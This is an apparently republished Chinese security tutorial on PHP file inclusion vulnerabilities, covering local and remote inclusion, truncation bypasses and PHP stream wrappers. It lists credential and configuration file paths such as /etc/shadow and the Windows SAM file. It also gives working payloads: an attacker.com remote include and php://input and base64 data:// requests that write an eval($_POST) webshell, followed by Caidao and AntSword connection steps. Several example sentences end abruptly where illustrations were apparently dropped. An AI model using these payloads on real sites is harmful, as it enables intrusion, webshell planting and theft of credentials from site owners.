1、免责声明
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途。
2、内容速览
服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。
文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。
示例代码
<?php
$filename = $_GET['filename'];
include($filename);
?>
例如:
$_GET['filename']
参数开发者没有经过严格的过滤,直接带入了include的函数,攻击者可以修改$_GET['filename']
的值,执行非预期的操作。
文件包含漏洞
<?php
$filename = $_GET['filename'];
include($filename);
?>
PHP中文件包含函数有以下四种:
require() require_once() include() include_once()
include
和require
区别主要是,include
在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require
函数出现错误的时候,会直接报错并退出程序的执行。
而include_once()
,require_once()
这两个函数,与前两个的不同之处在于这两个函数只包含一次,适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下,你想确保它只被包括一次以避免函数重定义,变量重新赋值等问题。
能够打开并包含本地文件,读取敏感信息内容。大部分文件包含都是本地包含
<?php
show_source(__FILE__);
if(isset($_GET['file'])){<!-- -->
$file = $_GET['file'];
include($file);
}else{<!-- -->
echo "Can you find me???";
}
?>
由于没有任何限制所以可以通过目录遍历漏洞来获取到系统中的其他内容,因为考察文件包含经常是结合任意文件读取漏洞的,所以就总结一些文件常见读取路径
常见的敏感目录如下
# 查看系统版本
c:\boot.ini
# IIS配置文件
c:\windows\system32\inetsrv\MetaBase.xml
# 存储Windows系统初次安装的密码
c:\windows\repair\sam
# MySQL配置
c:\ProgramFiles\mysql\my.ini
# MySQL root密码
c:\ProgramFiles\mysql\data\mysql\user.MYD
# php 配置信息
c:\windows\php.ini
# 账户信息
/etc/passwd
# 账户密码文件
/etc/shadow
# Apache2默认配置文件
/usr/local/app/apache2/conf/httpd.conf
# 虚拟网站配置
/usr/local/app/apache2/conf/extra/httpd-vhost.conf
# PHP 配置文件
/usr/local/app/php5/lib/php.ini
# Apache 配置文件
/etc/httpd/conf/httpd.conf
# MySQL 配置文件
/etc/my.conf
linux系统session的存储位置默认存储在/var/lib/php/session
目录下
测试代码
<?php
session_start();
$test=$_GET['testsession'];
$_SESSION["username"]=$test;
?>
testsession
变量的值存入到session中http://[ip]/session.php?testsession=test
后,会在/var/lib/php/session
目录下存储session的值通过将一句话带入参数,使用GET访问目标地址http://[ip]/session.php?ctfs=<?php phpinfo();?>
会在目录下存储session的值,session文件名称通过开发者模式可查看获取,然后通过访问该session文件进行执行payload
测试代码
<?php
$filename = $_GET['filename'];
include($filename . ".html");
?>
假如用户控制$filename
的值为../../etc/passwd
那么这段代码相当于include '/home/wwwrun/../../etc/passwd.html'
,而这个文件显然是不存在,这就需要截断,有以下几种截断方式:
1、%00
截断
用0字节(\x00)将作为字符串结束符,截断$filename
变量之后的字符串
例如:
http://www.ctfs-wiki.com/FI/FI.php?filename=../../../../../../../boot.ini%00
条件
magic_quotes_gpc = Off
2、路径长度截断
除了用%00
截断,还可以用长度截断
例如:
3、点号截断
类似于长度截断,windows下点号需要长于256
例如:
远程文件包含漏洞,能够包含远程服务器上的文件并执行,由于远程服务器的文件是我们可控的,因此漏洞一旦存在危害性会很大条件较为苛刻,PHP的配置条件需要如下:
测试代码
<?php
$filename = $_GET['filename'];
include($filename);
?>
构造一个文件http://www.attacker.com/echo.txt
代码如下:
<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[test]);?>");?>
访问
http://www.example.com/index.php?page=http://www.attacker.com/echo.txt
将会在目标网络的index.php
所在的目录下生成shell.php,内容为:
<?php eval($_POST[test]);?>
然后就可以通过这个木马得到shell
这可以配合文件上传 比如将上面这个echo.txt通过图片马上传到服务器,路径为/uploadfile/xxx.jpg
访问http://www.example.com/index.php?page=./uploadfile/xxx.jpg
即可
测试代码:
<?php include($_GET['filename'] . ".html"); ?>
同样是多了个后缀 需要绕过
1、问号绕过
例子
http://www.ctfs-wiki.com/FI/WFI.php?filename=http://ip/FI/php.txt?
2、#号绕过
http://www.ctfs-wiki.com/FI/WFI.php?filename=http://ip/FI/php.txt%23
1、如果存在本地文件包含漏洞时,不论包含 txt 还是 jpg,程序都会以 php 来解析运行,也就意味着可以上传一句话木马,直接用菜刀连接。
例如新建一个 1.txt 内容为:
<?php @eval($_POST['caidao']);?>
随后将后缀改为 jpg,利用文件包含漏洞包含此文件,结果如下:
2、可以利用 php://input 输入流执行任意命令,前提是 php.ini 的 allow_url_include 项设置为 on,不受版本控制,例如以下操作图:
使用火狐插件 hackbar 即可。
3、利用 php 的数据协议 data:// 可以查看文件源代码,前提是 php.ini 中的 allow_url_fopen 和 allow_url_include 两个配置为 on, 例如以下操作图:
当碰到 WAF 时,可以把 <> 这些特殊符号进行编码再试
PHP 带有很多内置 URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数,除了这些封装协议,还能通过 stream_wrapper_register() 来注册自定义的封装协议
PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器
1、php://filter
用法
?filename=php://filter/convert.base64-encode/resource=xxx.php
?filename=php://filter/read=convert.base64-encode/resource=xxx.php
2、php://input
file_get_contents()
时可以用php://input绕过使用burpsuite抓包再改包,Payload:
http://ip/file.php?a=php://input
更改请求方式为post,post过去的代码为
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]);?>');?>
再发包即可生成一个shell.php文件,然后使用蚁剑连接
通过file协议可以访问本地文件系统,读取到文件的内容
数据流封装器,和php://相似都是利用了流的概念
将原本的include的文件流重定向到了用户可控制的输入流中,简单来说就是执行文件的包含方法包含了你的输入流
条件
?file=data:text/plain,<?php phpinfo();?>
将木马使用base64编码
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]);?>');?>
编码之后
PD9QSFAgZnB1dHMoZm9wZW4oJ3NoZWxsLnBocCcsJ3cnKSwnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4nKTs/Pg==
Payload:
http://ip/file.php?a=data://text/plain;base64,PD9QSFAgZnB1dHMoZm9wZW4oJ3NoZWxsLnBocCcsJ3cnKSwnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4nKTs/Pg==
使用该payload即可在网站根目录下生成shell.php文件,然后蚁剑连接
php解压缩包的一个函数,不管后缀是什么,都会当做压缩包来解压,需要将一句话木马文件打包成zip压缩宝,然后将后缀改成png等其它格式
类似phar://,但是使用方法和条件有点区别
条件
#
编码为%23
,接上压缩包内的文件
需要指定绝对路径
include("head.php");